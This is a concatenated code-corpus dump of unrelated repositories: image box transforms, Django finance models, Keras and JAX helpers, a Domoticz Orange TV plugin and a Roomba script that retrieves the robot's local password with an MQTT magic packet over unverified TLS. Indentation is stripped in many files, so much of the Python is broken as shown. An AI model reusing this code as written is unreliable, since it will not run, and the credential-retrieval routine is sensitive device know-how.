return np.concatenate([bboxes[..., :2], sizes], axis=-1)
```
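A quick round-trip check for the NumPy converters above (import path assumed from the header): a bbox survives bbox2cbox/cbox2bbox, and bbox_affine applies a 3x3 transform such as a pure translation.
```python
import numpy as np
from xvision.transforms.boxes import bbox2cbox, cbox2bbox, bbox_affine  # path assumed

bboxes = np.array([[10.0, 20.0, 50.0, 80.0]])     # (x1, y1, x2, y2)
cboxes = bbox2cbox(bboxes)                         # [[30, 50, 40, 60]] as (cx, cy, w, h)
print(np.allclose(cbox2bbox(cboxes), bboxes))      # True

shift = np.array([[1.0, 0.0, 5.0],
                  [0.0, 1.0, -3.0],
                  [0.0, 0.0, 1.0]])                # translate by (+5, -3)
print(bbox_affine(bboxes, shift))                  # [[15. 17. 55. 77.]]
```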
#### File: xvision/transforms/warp.py
```python
import cv2
from .matrix2d import translate
def _pixel_matrix(matrix):
    # matrix maps float coordinates -> float coordinates, while OpenCV's
    # warpAffine expects pixel coordinates -> pixel coordinates,
    # so the following chain is needed:
    # 1. pixel coordinates -> float coordinates: translate(0.5)
    # 2. float coordinates -> float coordinates: matrix
    # 3. float coordinates -> pixel coordinates: translate(-0.5)
return translate(-0.5) @ matrix @ translate(0.5)
def warp_affine(src, M, dsize, *args, **kwargs):
M = _pixel_matrix(M)
return cv2.warpAffine(src, M[:2, :], dsize, *args, **kwargs)
```
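A hedged usage sketch for `warp_affine` (the `xvision.transforms.warp` import path is assumed): the 3x3 matrix is built by hand here, so only the translate() helper used inside the module itself is relied on.
```python
import numpy as np
from xvision.transforms.warp import warp_affine  # path assumed from the header above

src = np.zeros((100, 100, 3), dtype=np.uint8)
src[40:60, 40:60] = 255                          # white square in the middle
M = np.array([[1.0, 0.0, 10.0],
              [0.0, 1.0, 5.0],
              [0.0, 0.0, 1.0]])                  # float-coordinate transform: +10 px in x, +5 px in y
dst = warp_affine(src, M, (100, 100))            # square shifted right and down
```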
#### File: xvision/utils/misc.py
```python
import os
import math
import multiprocessing
# copy and edit from https://github.com/conan-io/conan/blob/develop/conans/client/tools/oss.py
class CpuProperties(object):
def get_cpu_quota(self):
        return int(open("/sys/fs/cgroup/cpu/cpu.cfs_quota_us").read())
    def get_cpu_period(self):
        return int(open("/sys/fs/cgroup/cpu/cpu.cfs_period_us").read())
def get_cpus(self):
try:
cfs_quota_us = self.get_cpu_quota()
cfs_period_us = self.get_cpu_period()
if cfs_quota_us > 0 and cfs_period_us > 0:
return int(math.ceil(cfs_quota_us / cfs_period_us))
except:
pass
return multiprocessing.cpu_count()
def cpu_count(output=None):
try:
env_cpu_count = os.getenv("CONAN_CPU_COUNT", None)
if env_cpu_count is not None and not env_cpu_count.isdigit():
raise RuntimeError("Invalid CONAN_CPU_COUNT value '%s', "
"please specify a positive integer" % env_cpu_count)
if env_cpu_count:
return int(env_cpu_count)
else:
return CpuProperties().get_cpus()
except NotImplementedError:
output.warn(
"multiprocessing.cpu_count() not implemented. Defaulting to 1 cpu")
return 1 # Safe guess
if __name__ == '__main__':
n = cpu_count()
print(n)
``` |
{
"source": "jimmysyss/cookiecutter",
"score": 2
} |
#### File: cookiecutter/finance/admin.py
```python
from django.contrib import admin
# Register your models here.
from finance.models import Currency
class BaseAdmin(admin.ModelAdmin):
readonly_fields = ('created_by', 'created_date', 'modified_by', 'modified_date', )
def save_model(self, request, obj, form, change):
if change:
obj.modified_by = request.user.username
else:
obj.created_by = request.user.username
obj.modified_by = request.user.username
obj.save()
@admin.register(Currency)
class CurrencyAdmin(BaseAdmin):
list_display = ('full_name', 'name',)
```
#### File: cookiecutter/finance/models.py
```python
from django.contrib.postgres.fields import ArrayField, JSONField, IntegerRangeField
from django.db import models
# Create your models here.
class BaseModel(models.Model):
created_date = models.DateTimeField(auto_now_add=True)
created_by = models.CharField(max_length=50, editable=False)
modified_date = models.DateTimeField(auto_now=True)
modified_by = models.CharField(max_length=50, editable=False)
class Meta:
abstract = True
class Currency(BaseModel):
name = models.CharField(max_length=10, unique=True)
full_name = models.CharField(max_length=50)
display_format = models.CharField(max_length=50)
flag = models.CharField(max_length=10)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "currencies"
class CurrencyPair(BaseModel):
name = models.CharField(max_length=10, unique=True)
display_format = models.CharField(max_length=50)
base_ccy = models.CharField(max_length=10)
alt_ccy = models.CharField(max_length=10)
pass
class Exchange(BaseModel):
pass
class Calendar(BaseModel):
pass
class InterestRate(BaseModel):
pass
class BusinessEntity(BaseModel):
pass
class Instrument(BaseModel):
pass
class Security(BaseModel):
pass
class HelloWorldEntity(BaseModel):
name = models.CharField(max_length=10, unique=True)
array_field = ArrayField(models.CharField(max_length=10), size=8, null=True)
json_field = JSONField(null=True)
integer_range_field = IntegerRangeField(null=True)
def __str__(self):
return self.name
```
#### File: cookiecutter/finance/views.py
```python
from django.http import HttpResponse
from rest_framework import viewsets
from finance.models import Currency, HelloWorldEntity
from finance.serializer import HelloWorldEntitySerializer
def index(request):
return HttpResponse("Hello, world. You're at the polls index.")
class HelloWorldEntityViewSet(viewsets.ModelViewSet):
queryset = HelloWorldEntity.objects.all()
serializer_class = HelloWorldEntitySerializer
``` |
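finance/serializer.py is imported above but not included in this dump; a minimal ModelSerializer that would satisfy the import might look like the following (a sketch, the field selection is an assumption):
```python
from rest_framework import serializers
from finance.models import HelloWorldEntity

class HelloWorldEntitySerializer(serializers.ModelSerializer):
    class Meta:
        model = HelloWorldEntity
        fields = '__all__'  # assumed: expose all model fields
```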
{
"source": "Jimmy-Tempest/Blokk",
"score": 2
} |
#### File: backend/api/middleware.py
```python
import logging
from django.contrib.auth import authenticate
class JWTAuthMiddleware:
def __init__(self, get_response):
self.get_response = get_response
# One-time configuration and initialization.
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
logging.info("JWTAuthMiddleware called")
# authenticate user
try:
user = authenticate(request)
if user is not None and user.is_authenticated:
logging.info("JWTAuthMiddleware user set " + str(user))
request.user = user
except Exception as err:
logging.info("JWTAuthMiddleware failed " + str(err))
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
``` |
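To take effect, the middleware above has to be listed in the project's Django settings; a sketch (the surrounding middleware stack and module paths are assumptions):
```python
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'api.middleware.JWTAuthMiddleware',  # after AuthenticationMiddleware so authenticate() can run
]
```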
{
"source": "Jimmy-Tempest/Network-Wirer",
"score": 3
} |
#### File: api/filters/filters.py
```python
import numpy as np
from sklearn.utils import shuffle
from sklearn.preprocessing import MinMaxScaler, StandardScaler, LabelEncoder, Normalizer, OrdinalEncoder, LabelBinarizer
from sklearn.feature_extraction.text import CountVectorizer
from pandas import read_csv
# url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/sonar.csv"
# url = "http://127.0.0.1:8000/media/datasets/user_1/mnist_train.csv"
# dataset = read_csv(url)
# dataset = dataset[["Tweets", "label"]]
# # print(dataset)
# data = dataset.values
# X, y = data[0:, :], data[0, :]
# print(X)
# print(X)
# y = LabelEncoder().fit_transform(y.astype('str'))
# trans = CountVectorizer()
# X = trans.fit_transform(X)
# model = Sequential([
# Dense(units=16, activation="relu"),
# Dense(units=32, activation="relu"),
# Dense(units=32, activation="relu"),
# Dense(units=64, activation="relu"),
# Dense(units=2, activation="softmax")
# ])
# model.compile(optimizer=Adam(learning_rate=0.0001),
# loss="sparse_categorical_crossentropy", metrics=["accuracy"])
# model.fit(x=X, y=y, validation_split=0.2, epochs=50, shuffle=True)
transformers = {
"minMax": MinMaxScaler(),
"Standardize": StandardScaler(),
"label": LabelEncoder(),
"normalize": Normalizer(),
"ordinalEncoder": OrdinalEncoder(),
"binarize": LabelBinarizer()
}
# print(filters["water"])
def applyFilter(data, filters):
for filter in filters:
try:
transformer = transformers[filter]
except KeyError:
continue
if filter == "label":
data = transformer.fit_transform(data)
data = transformer.fit_transform(data.astype(np.float32))
# print(data)
return(data)
``` |
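A quick usage sketch for applyFilter with a toy feature matrix (import path assumed from the header); filter names must match keys of the transformers dict above.
```python
import numpy as np
from api.filters.filters import applyFilter  # path assumed from the header above

X = np.array([[1.0, 200.0],
              [2.0, 400.0],
              [3.0, 600.0]])
print(applyFilter(X, ["minMax"]))   # each column rescaled to [0, 1]
```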
{
"source": "Jimmy-Tempest/SaNNs",
"score": 3
} |
#### File: utils/loss/__init__.py
```python
from .categorical_cross_entropy import categorical_cross_entropy
from jax import jit, vmap
import jax.numpy as np
def calc_loss(y_hat, y, loss_fn):
"""
Description:
Calculate the loss.
Params:
y_hat: np.ndarray
The predicted output.
y: np.ndarray
The true output.
loss_fn: function
The loss function.
"""
batch_loss = vmap(jit(loss_fn))
return np.mean(batch_loss(y_hat, y))
``` |
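A tiny standalone sketch of what calc_loss does: vmap the per-example loss over the batch and take the mean. The per-example loss here is a stand-in, since categorical_cross_entropy lives in a sibling module not shown above.
```python
import jax.numpy as np
from jax import jit, vmap

def squared_error(y_hat, y):
    # per-example loss over one (prediction, target) pair
    return np.sum((y_hat - y) ** 2)

y_hat = np.array([[0.9, 0.1], [0.2, 0.8]])
y = np.array([[1.0, 0.0], [0.0, 1.0]])
batch_loss = vmap(jit(squared_error))
print(np.mean(batch_loss(y_hat, y)))  # equivalent to calc_loss(y_hat, y, squared_error)
```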
{
"source": "Jimmy-Tempest/SWIM-Intent",
"score": 3
} |
#### File: SWIM-Intent/utils/model.py
```python
from keras.layers import Dense
from keras.models import Sequential
import keras
import tensorflow as tf
import tflearn # important do not remove
def create_model(training_shape:int, output_shape:int):
model = Sequential([
Dense(8, input_shape=(training_shape, ), activation="relu"),
Dense(8, activation="relu"),
Dense(output_shape, activation="softmax")
])
loss = keras.losses.BinaryCrossentropy(from_logits=False)
optim = tf.optimizers.Adam(lr=0.0083)
metrics = ["accuracy"]
# print("\nCompiling Model...\n")
model.compile(loss=loss, optimizer=optim, metrics=metrics)
return model
def train_model(model:Sequential, training, output, epoch:int = 50, filename="model.h5", save=False, callbacks=None):
model.fit(training, output, epochs=epoch, verbose=2, callbacks=callbacks, batch_size=8, shuffle=True)
if save:
model.save(filename)
return model
``` |
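A hedged usage sketch for the helpers above with random bag-of-words features and one-hot intent labels (shapes are illustrative; the import path is assumed from the header):
```python
import numpy as np
from utils.model import create_model, train_model  # path assumed from the header above

training = np.random.rand(32, 20).astype("float32")    # 32 samples, 20 features
output = np.eye(5)[np.random.randint(0, 5, size=32)]   # 5 intent classes, one-hot
model = create_model(training_shape=20, output_shape=5)
model = train_model(model, training, output, epoch=5)
```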
{
"source": "JimmyTournemaine/OrangeTV",
"score": 3
} |
#### File: JimmyTournemaine/OrangeTV/plugin.py
```python
import json
import os
errmsg = ""
try:
import Domoticz
except Exception as e:
errmsg += "Domoticz core start error: "+str(e)
class ContextFactory:
def create(self, conn, status):
osdContext = status['osdContext']
if osdContext == 'MAIN_PROCESS':
context = OffContext()
elif osdContext == 'LIVE':
context = LiveContext(status['playedMediaId'])
else:
context = OnContext(osdContext)
return context.connect(conn)
class Context:
def __init__(self, state, text):
self.state = state
self.text = text
def connect(self, tvConn):
self.conn = tvConn
return self
def send(self, key, mode=0, op="01"):
self.conn.Send(
{'Verb': 'GET', 'URL': f'/remoteControl/cmd?operation={op}&mode={mode}&key={key}'})
class OffContext(Context):
def __init__(self):
super().__init__(State.OFF, 'Off')
class OnContext(Context):
def __init__(self, status):
super().__init__(State.ON, status.title())
def onHome(self):
self.send(139)
def onInfo(self):
pass
def onBack(self):
self.send(158)
def onContextMenu(self):
self.send(139)
def onSelect(self):
self.send(352)
def onUp(self):
self.send(103)
def onLeft(self):
self.send(105)
def onRight(self):
self.send(106)
def onDown(self):
self.send(108)
def onChannels(self):
pass
def onChannelUp(self):
self.send(402)
def onChannelDown(self):
self.send(403)
def onFullScreen(self):
pass
def onShowSubtitles(self):
self.send(0)
def onStop(self):
pass
def onVolumeUp(self):
self.send(115)
def onVolumeDown(self):
self.send(114)
def onMute(self):
self.send(113)
def onPlayPause(self):
self.send(164)
def onFastForward(self):
self.send(159)
def onBigStepForward(self):
pass
def onRewind(self):
self.send(168)
def onBigStepBack(self):
pass
class LiveContext(OnContext):
def __init__(self, playId):
super().__init__(State.PLAYING, f'Live: {epg_map[playId]}')
class State:
OFF = 0
ON = 1
PLAYING = 7
DISCONNECTED = 8
UNKNOWN = 10
def is_running(Device):
return Device.nValue > 0
def load_epg():
plug_dir = os.path.dirname(os.path.realpath(__file__))
with open(f"{plug_dir}/epg_id.json") as epg_file:
epg = json.load(epg_file)
return {v: k for k, v in epg.items()}
epg_map = load_epg()
class Plugin:
status = {}
def __init__(self):
return
def onStart(self):
if errmsg == "":
# Debugging
Domoticz.Debugging(1)
if (len(Devices) == 0):
Domoticz.Device(Name="Status", Unit=1, Type=244,
Subtype=73, Switchtype=17, Used=1).Create()
Domoticz.Log("Device created.")
self.OrangeTVConn = Domoticz.Connection(
Name="OrangeTVConn", Transport="TCP/IP", Protocol="HTTP", Address=Parameters["Address"], Port=Parameters["Port"])
self.OrangeTVConn.Connect()
Domoticz.Heartbeat(Parameters["Interval"])
else:
Domoticz.Error(
"Plugin::onStart: Domoticz Python env error {}".format(errmsg))
def onConnect(self, Connection, Status, Description):
if (Status == 0):
Domoticz.Log("Connected successfully to: " +
Connection.Address+":"+Connection.Port)
else:
Domoticz.Log("Failed to connect ("+str(Status)+") to: " +
Connection.Address+":"+Connection.Port)
Domoticz.Debug("Failed to connect ("+str(Status)+") to: " +
Connection.Address+":"+Connection.Port+" with error: "+Description)
return True
def onDisconnect(self, Connection):
Devices[1].Update(8, 'Disconnected')
def onMessage(self, Connection, Data):
if int(Data['Status']) == 200:
Response = json.loads(Data['Data'])
# Update player status
if 'result' in Response and 'data' in Response['result'] and 'osdContext' in Response['result']['data']:
self.onStatusUpdated(Response['result']['data'])
return
Domoticz.Log(f"Unexpected response: {str(Data)}")
else:
Domoticz.Log(f"Error response: {str(Data)}")
def onCommand(self, Unit, Command, Level, Color):
Domoticz.Debug("onCommand called for Unit " + str(Unit) +
": Parameter '" + str(Command) + "', Level: " + str(Level))
if Unit in Devices:
Device = Devices[Unit]
# Switch Off
if Command == 'Off' and is_running(Device):
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=01&mode=0&key=116'})
Device.Update(0, 'Off')
# Switch On
elif Command == 'On' and not is_running(Device):
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=01&mode=0&key=116'})
Device.Update(1, 'On')
# Other command on a running device
elif f"on{Command}" in self.context and is_running(Device):
getattr(self.context, f"on{Command}")()
# Unknown command
else:
Domoticz.Error(f"Unknown command {str(Command)}")
def onHeartbeat(self):
if 1 in Devices and self.OrangeTVConn.Connected():
self.OrangeTVConn.Send(
{'Verb': 'GET', 'URL': '/remoteControl/cmd?operation=10'})
def onStatusUpdated(self, status):
Domoticz.Debug(f"onStatusUpdated: status={str(status)}")
if 1 in Devices:
self.context = ContextFactory().create(self.OrangeTVConn, status)
Devices[1].Update(self.context.state, self.context.text)
# Domoticz Python Plugin Interface
global _plugin
_plugin = Plugin()
def onStart():
global _plugin
_plugin.onStart()
def onConnect(Connection, Status, Description):
global _plugin
_plugin.onConnect(Connection, Status, Description)
def onDisconnect(Connection):
global _plugin
_plugin.onDisconnect(Connection)
def onMessage(Connection, Data):
global _plugin
_plugin.onMessage(Connection, Data)
def onCommand(Unit, Command, Level, Color):
global _plugin
_plugin.onCommand(Unit, Command, Level, Color)
def onHeartbeat():
global _plugin
_plugin.onHeartbeat()
``` |
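Outside of Domoticz, the same set-top-box HTTP API the plugin drives can be exercised directly; a sketch using requests (the decoder address and port are placeholders; key 116 is the power toggle and operation=10 the status query used above):
```python
import requests

BOX = "http://192.168.1.12:8080"  # decoder address/port (placeholder)
status = requests.get(f"{BOX}/remoteControl/cmd?operation=10").json()
print(status["result"]["data"]["osdContext"])                         # e.g. MAIN_PROCESS or LIVE
requests.get(f"{BOX}/remoteControl/cmd?operation=01&mode=0&key=116")  # toggle power
```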
{
"source": "JimmyTournemaine/Roomba980-Python",
"score": 3
} |
#### File: Roomba980-Python/roomba/password.py
```python
__version__ = "2.0a"
'''
Python 3.6
Quick Program to get blid and password from roomba
<NAME> 5th May 2017: V 1.0: Initial Release
<NAME> 22nd Dec 2020: V2.0: Updated for i and S Roomba versions, update to minimum python version 3.6
'''
from pprint import pformat
import json
import logging
import socket
import ssl
import sys
import time
from ast import literal_eval
import configparser
class Password(object):
'''
Get Roomba blid and password - only V2 firmware supported
if IP is not supplied, class will attempt to discover the Roomba IP first.
Results are written to a config file, default ".\config.ini"
V 1.2.3 NW 9/10/2018 added support for Roomba i7
V 1.2.5 NW 7/10/2019 changed PROTOCOL_TLSv1 to PROTOCOL_TLS to fix i7 software connection problem
V 1.2.6 NW 12/11/2019 add cipher to ssl to avoid dh_key_too_small issue
V 2.0 NW 22nd Dec 2020 updated for S and i versions plus braava jet m6, min version of python 3.6
V 2.1 NW 9th Dec 2021 Added getting password from aws cloud.
'''
VERSION = __version__ = "2.1"
config_dicts = ['data', 'mapsize', 'pmaps', 'regions']
def __init__(self, address='255.255.255.255', file=".\config.ini", login=[]):
self.address = address
self.file = file
self.login = None
        self.password = None  # may be overridden from the login list below
if len(login) >= 2:
self.login = login[0]
self.password = login[1]
self.log = logging.getLogger('Roomba.{}'.format(__class__.__name__))
self.log.info("Using Password version {}".format(self.__version__))
def read_config_file(self):
#read config file
Config = configparser.ConfigParser()
roombas = {}
try:
Config.read(self.file)
self.log.info("reading/writing info from config file {}".format(self.file))
roombas = {s:{k:literal_eval(v) if k in self.config_dicts else v for k, v in Config.items(s)} for s in Config.sections()}
#self.log.info('data read from {}: {}'.format(self.file, pformat(roombas)))
except Exception as e:
self.log.exception(e)
return roombas
def receive_udp(self):
#set up UDP socket to receive data from robot
port = 5678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(10)
if self.address == '255.255.255.255':
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.bind(("", port)) #bind all interfaces to port
self.log.info("waiting on port: {} for data".format(port))
message = 'irobotmcs'
s.sendto(message.encode(), (self.address, port))
roomba_dict = {}
while True:
try:
udp_data, addr = s.recvfrom(1024) #wait for udp data
#self.log.debug('Received: Robot addr: {} Data: {}'.format(addr, udp_data))
if udp_data and udp_data.decode() != message:
try:
#if self.address != addr[0]:
# self.log.warning(
# "supplied address {} does not match "
# "discovered address {}, using discovered "
# "address...".format(self.address, addr[0]))
parsedMsg = json.loads(udp_data.decode())
if addr[0] not in roomba_dict.keys():
s.sendto(message.encode(), (self.address, port))
roomba_dict[addr[0]]=parsedMsg
self.log.info('Robot at IP: {} Data: {}'.format(addr[0], json.dumps(parsedMsg, indent=2)))
except Exception as e:
self.log.info("json decode error: {}".format(e))
self.log.info('RECEIVED: {}'.format(pformat(udp_data)))
except socket.timeout:
break
s.close()
return roomba_dict
def add_cloud_data(self, cloud_data, roombas):
for k, v in roombas.copy().items():
robotid = v.get('robotid', v.get("hostname", "").split('-')[1])
for id, data in cloud_data.items():
if robotid == id:
roombas[k]["password"] = data.get('password')
return roombas
def get_password(self):
#load roombas from config file
file_roombas = self.read_config_file()
cloud_roombas = {}
#get roomba info
roombas = self.receive_udp()
if self.login and self.password:
self.log.info("Getting Roomba information from iRobot aws cloud...")
from getcloudpassword import irobotAuth
iRobot = irobotAuth(self.login, self.password)
iRobot.login()
cloud_roombas = iRobot.get_robots()
self.log.info("Got cloud info: {}".format(json.dumps(cloud_roombas, indent=2)))
self.log.info("Found {} roombas defined in the cloud".format(len(cloud_roombas)))
if len(cloud_roombas) > 0 and len(roombas) > 0:
roombas = self.add_cloud_data(cloud_roombas, roombas)
if len(roombas) == 0:
self.log.warning("No Roombas found on network, try again...")
return False
self.log.info("{} robot(s) already defined in file{}, found {} robot(s) on network".format(len(file_roombas), self.file, len(roombas)))
for addr, parsedMsg in roombas.items():
blid = parsedMsg.get('robotid', parsedMsg.get("hostname", "").split('-')[1])
robotname = parsedMsg.get('robotname', 'unknown')
if int(parsedMsg.get("ver", "3")) < 2:
self.log.info("Roombas at address: {} does not have the correct "
"firmware version. Your version info is: {}".format(addr,json.dumps(parsedMsg, indent=2)))
continue
password = parsedMsg.get('password')
if password is None:
self.log.info("To add/update Your robot details,"
"make sure your robot ({}) at IP {} is on the Home Base and "
"powered on (green lights on). Then press and hold the HOME "
"button on your robot until it plays a series of tones "
"(about 2 seconds). Release the button and your robot will "
"flash WIFI light.".format(robotname, addr))
else:
self.log.info("Configuring robot ({}) at IP {} from cloud data, blid: {}, password: {}".format(robotname, addr, blid, password))
if sys.stdout.isatty():
char = input("Press <Enter> to continue...\r\ns<Enter> to skip configuring this robot: ")
if char == 's':
self.log.info('Skipping')
continue
#self.log.info("Received: %s" % json.dumps(parsedMsg, indent=2))
if password is None:
self.log.info("Roomba ({}) IP address is: {}".format(robotname, addr))
data = self.get_password_from_roomba(addr)
if len(data) <= 7:
self.log.error( 'Error getting password for robot {} at ip{}, received {} bytes. '
'Follow the instructions and try again.'.format(robotname, addr, len(data)))
continue
# Convert password to str
password = str(data[7:].decode().rstrip('\x00')) #for i7 - has null termination
self.log.info("blid is: {}".format(blid))
self.log.info('Password=> {} <= Yes, all this string.'.format(password))
self.log.info('Use these credentials in roomba.py')
file_roombas.setdefault(addr, {})
file_roombas[addr]['blid'] = blid
file_roombas[addr]['password'] = password
file_roombas[addr]['data'] = parsedMsg
return self.save_config_file(file_roombas)
def get_password_from_roomba(self, addr):
'''
Send MQTT magic packet to addr
this is 0xf0 (mqtt reserved) 0x05(data length) 0xefcc3b2900 (data)
Should receive 37 bytes containing the password for roomba at addr
This is is 0xf0 (mqtt RESERVED) length (0x23 = 35) 0xefcc3b2900 (magic packet),
followed by 0xXXXX... (30 bytes of password). so 7 bytes, followed by 30 bytes of password
total of 37 bytes
Uses 10 second timeout for socket connection
'''
data = b''
packet = bytes.fromhex('f005efcc3b2900')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
#context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context = ssl.SSLContext()
#context.set_ciphers('DEFAULT@SECLEVEL=1:HIGH:!DH:!aNULL')
wrappedSocket = context.wrap_socket(sock)
try:
wrappedSocket.connect((addr, 8883))
self.log.debug('Connection Successful')
wrappedSocket.send(packet)
self.log.debug('Waiting for data')
while len(data) < 37:
data_received = wrappedSocket.recv(1024)
data+= data_received
if len(data_received) == 0:
self.log.info("socket closed")
break
wrappedSocket.close()
return data
except socket.timeout as e:
self.log.error('Connection Timeout Error (for {}): {}'.format(addr, e))
except (ConnectionRefusedError, OSError) as e:
if e.errno == 111: #errno.ECONNREFUSED
self.log.error('Unable to Connect to roomba at ip {}, make sure nothing else is connected (app?), '
'as only one connection at a time is allowed'.format(addr))
elif e.errno == 113: #errno.No Route to Host
self.log.error('Unable to contact roomba on ip {} is the ip correct?'.format(addr))
else:
self.log.error("Connection Error (for {}): {}".format(addr, e))
except Exception as e:
self.log.exception(e)
self.log.error('Unable to get password from roomba')
return data
def save_config_file(self, roomba):
Config = configparser.ConfigParser()
if roomba:
for addr, data in roomba.items():
Config.add_section(addr)
for k, v in data.items():
#self.log.info('saving K: {}, V: {}'.format(k, pformat(v) if k in self.config_dicts else v))
Config.set(addr,k, pformat(v) if k in self.config_dicts else v)
# write config file
with open(self.file, 'w') as cfgfile:
Config.write(cfgfile)
self.log.info('Configuration saved to {}'.format(self.file))
else: return False
return True
def get_roombas(self):
roombas = self.read_config_file()
if not roombas:
self.log.warn("No roomba or config file defined, I will attempt to "
"discover Roombas, please put the Roomba on the dock "
"and follow the instructions:")
self.get_password()
return self.get_roombas()
self.log.info("{} Roombas Found".format(len(roombas)))
for ip in roombas.keys():
roombas[ip]["roomba_name"] = roombas[ip]['data']['robotname']
return roombas
def main():
import argparse
loglevel = logging.DEBUG
LOG_FORMAT = "%(asctime)s %(levelname)s [%(name)s] %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
logging.basicConfig(format=LOG_FORMAT, datefmt=LOG_DATE_FORMAT, level=loglevel)
#-------- Command Line -----------------
parser = argparse.ArgumentParser(
description='Get Robot passwords and update config file')
parser.add_argument(
'login',
nargs='*',
action='store',
type=str,
default=[],
help='iRobot Account Login and Password (default: None)')
parser.add_argument(
'-f', '--configfile',
action='store',
type=str,
default="./config.ini",
help='config file name, (default: %(default)s)')
parser.add_argument(
'-R','--roombaIP',
action='store',
type=str,
default='255.255.255.255',
help='ipaddress of Roomba (default: %(default)s)')
arg = parser.parse_args()
get_passwd = Password(arg.roombaIP, file=arg.configfile, login=arg.login)
get_passwd.get_password()
if __name__ == '__main__':
main()
``` |
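A usage sketch mirroring main(): discover robots by UDP broadcast and write blid/password pairs to config.ini (module path assumed relative to the roomba/ directory):
```python
import logging
from password import Password  # roomba/password.py, path assumed

logging.basicConfig(level=logging.INFO)
getter = Password('255.255.255.255', file='./config.ini')  # broadcast discovery
if getter.get_password():
    print(getter.get_roombas())
```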